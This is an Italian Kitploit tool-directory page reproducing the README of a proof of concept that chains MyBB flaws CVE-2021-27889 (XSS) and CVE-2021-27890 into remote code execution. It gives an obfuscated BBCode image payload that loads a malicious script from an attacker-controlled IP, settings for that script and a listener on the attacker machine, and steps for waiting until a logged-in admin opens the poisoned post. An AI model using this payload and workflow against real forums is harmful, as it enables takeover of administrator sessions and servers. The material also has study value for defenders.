Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Mybb-XSS_SQL_RCE-POC — Mybb associa CVE-2021-27890 e CVE-2021-27889 al poc RCE. | Kitploit
Strumenti/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
Generazione di PayloadExploitSfruttamento di Applicazioni Web
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

Mybb associa CVE-2021-27890 e CVE-2021-27889 al poc RCE.

Vedi Repository
1025 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Mybb-XSS_SQL_RCE_POC

Mybb associa CVE-2021-27890 & CVE-2021-27889 al POC RCE

Prima dell'uso:

Ci sono due file qui: 1.js e attack_listen.py

Devi modificare questi due file:

1.js:

modifica l'url del forum Mybb e l'url dell'attacco:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

modifica host e porta dell'attacco:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

Utilizzo:

CVE-2021-27889 è una XSS. Devi iniettare il seguente payload in "New Post Thread", "Reply" o "Private Messages" prima di eseguire l'attacco. In questa demo, invio il payload a "New Post Thread"

nota che 192.168.92.165 è l'IP del server malintenzionato, devi cambiarlo.

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


Ora la nostra js malintenzionata 1.js è stata iniettata con successo. Poi dobbiamo attendere che un Admin visiti questo Post con il cookie della pagina admin a cui ha effettuato l'accesso.

Nota che l'utente Admin non deve necessariamente effettuare l'accesso alla pagina del forum.


Durante l'attesa, dobbiamo eseguire "attack_listen.py" sulla nostra macchina d'attacco, per identificare se l'utente Admin viene attaccato.

root@kitploit:~
python3 attack_listen.py

Quando l'utente Admin visita il post malintenzionato, la js malintenzionata eseguirà l'attacco:


Possiamo ricevere le informazioni sulla nostra macchina d'attacco:

Scarica lo strumento